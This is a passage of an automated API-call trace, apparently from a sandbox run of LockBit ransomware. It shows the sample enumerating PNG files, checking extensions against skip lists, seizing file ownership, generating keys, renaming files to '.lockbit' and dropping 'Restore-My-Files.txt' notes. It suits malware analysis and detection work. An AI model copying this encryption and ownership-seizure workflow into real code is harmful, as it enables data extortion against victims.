[0081.326] lstrcmpiW (lpString1="bootsect.bak", lpString2="203x8subpicture.png") returned 1 [0081.326] lstrcmpiW (lpString1="autorun.inf", lpString2="203x8subpicture.png") returned 1 [0081.326] lstrcmpiW (lpString1="thumbs.db", lpString2="203x8subpicture.png") returned 1 [0081.326] lstrcmpiW (lpString1="iconcache.db", lpString2="203x8subpicture.png") returned 1 [0081.326] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\") returned="" [0081.326] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png") returned=".png" [0081.326] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.326] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.326] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.326] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.327] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.327] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.327] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.327] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.327] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.327] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.327] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.327] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.353] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.353] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.353] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.353] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.353] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.353] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.353] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.353] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.354] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.354] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png.lockbit") returned 86 [0081.354] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.355] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.375] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.377] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.377] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.378] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.378] RtlFreeAnsiString (AnsiString="\\") [0081.378] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.378] malloc (_Size=0x200) returned 0x77d800 [0081.378] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.378] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.378] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.378] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.379] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.379] CloseHandle (hObject=0x3b4) returned 1 [0081.379] free (_Block=0x77d800) [0081.379] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\203x8subpicture.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.379] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.379] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.379] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=2820) returned 1 [0081.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.380] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.380] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0081.388] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.388] malloc (_Size=0xc2) returned 0x77d800 [0081.388] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0xc0000008 [0081.389] free (_Block=0x77d800) [0081.389] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\203x8subpicture.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 1 [0081.389] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt") returned 79 [0081.389] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.389] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70c1490f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70c1490f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x191f, dwReserved0=0x0, dwReserved1=0x0, cFileName="blackbars60.png", cAlternateFileName="")) returned 1 [0081.389] lstrcmpiW (lpString1=".", lpString2="blackbars60.png") returned -1 [0081.389] lstrcmpiW (lpString1="..", lpString2="blackbars60.png") returned -1 [0081.389] PathFindExtensionW (pszPath="blackbars60.png") returned=".png" [0081.389] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.389] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.389] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.390] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.390] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.390] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.390] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.390] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.390] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.390] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.390] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.390] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.390] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.391] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="blackbars60.png") returned 1 [0081.391] lstrcmpiW (lpString1="ntldr", lpString2="blackbars60.png") returned 1 [0081.391] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="blackbars60.png") returned 1 [0081.391] lstrcmpiW (lpString1="bootsect.bak", lpString2="blackbars60.png") returned 1 [0081.391] lstrcmpiW (lpString1="autorun.inf", lpString2="blackbars60.png") returned -1 [0081.391] lstrcmpiW (lpString1="thumbs.db", lpString2="blackbars60.png") returned 1 [0081.391] lstrcmpiW (lpString1="iconcache.db", lpString2="blackbars60.png") returned 1 [0081.391] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\") returned="" [0081.391] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png") returned=".png" [0081.391] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.391] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.391] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.391] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.392] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.392] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.392] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.392] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.392] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.392] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.392] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.392] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.392] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.392] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.392] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.392] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.392] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.392] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.392] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.392] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png.lockbit") returned 82 [0081.392] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\blackbars60.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.393] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.393] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.393] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.393] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.393] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.393] RtlFreeAnsiString (AnsiString="\\") [0081.394] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b4) returned 0x0 [0081.394] malloc (_Size=0x200) returned 0x77d800 [0081.394] NtQueryInformationToken (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.394] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.394] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.394] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.394] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.395] CloseHandle (hObject=0x3b4) returned 1 [0081.395] free (_Block=0x77d800) [0081.395] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\blackbars60.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0081.395] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.395] malloc (_Size=0x40068) returned 0x1fb18c0 [0081.395] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=6431) returned 1 [0081.395] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.396] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0081.396] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.396] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.396] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0081.396] ReadFile (in: hFile=0x3b4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0081.401] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.401] malloc (_Size=0xba) returned 0x77d800 [0081.401] NtSetInformationFile (FileHandle=0x3b4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xba, FileInformationClass=0xa) returned 0xc0000008 [0081.404] free (_Block=0x77d800) [0081.404] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\blackbars60.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles") returned 1 [0081.404] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt") returned 79 [0081.405] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\layeredtitles\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.405] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70abdcca, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70abdcca, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1964f3, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5fed, dwReserved0=0x0, dwReserved1=0x0, cFileName="layers.png", cAlternateFileName="")) returned 1 [0081.405] lstrcmpiW (lpString1=".", lpString2="layers.png") returned -1 [0081.405] lstrcmpiW (lpString1="..", lpString2="layers.png") returned -1 [0081.405] PathFindExtensionW (pszPath="layers.png") returned=".png" [0081.405] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.405] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.405] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.406] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.406] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.406] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.406] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.406] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.406] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.406] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.406] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.406] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.406] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.407] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.407] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="layers.png") returned 1 [0081.407] lstrcmpiW (lpString1="ntldr", lpString2="layers.png") returned 1 [0081.407] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="layers.png") returned 1 [0081.407] lstrcmpiW (lpString1="bootsect.bak", lpString2="layers.png") returned -1 [0081.407] lstrcmpiW (lpString1="autorun.inf", lpString2="layers.png") returned -1 [0081.407] lstrcmpiW (lpString1="thumbs.db", lpString2="layers.png") returned 1 [0081.407] lstrcmpiW (lpString1="iconcache.db", lpString2="layers.png") returned -1 [0081.407] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\") returned="" [0081.407] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\LayeredTitles\\layers.png") returned=".png" [0081.407] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.407] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.407] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.407] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.407] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.407] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.407] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.407] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.408] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.408] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.408] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.408] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.408] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.408] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.408] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.408] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.408] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.408] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.408] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.408] lstrcmpiW 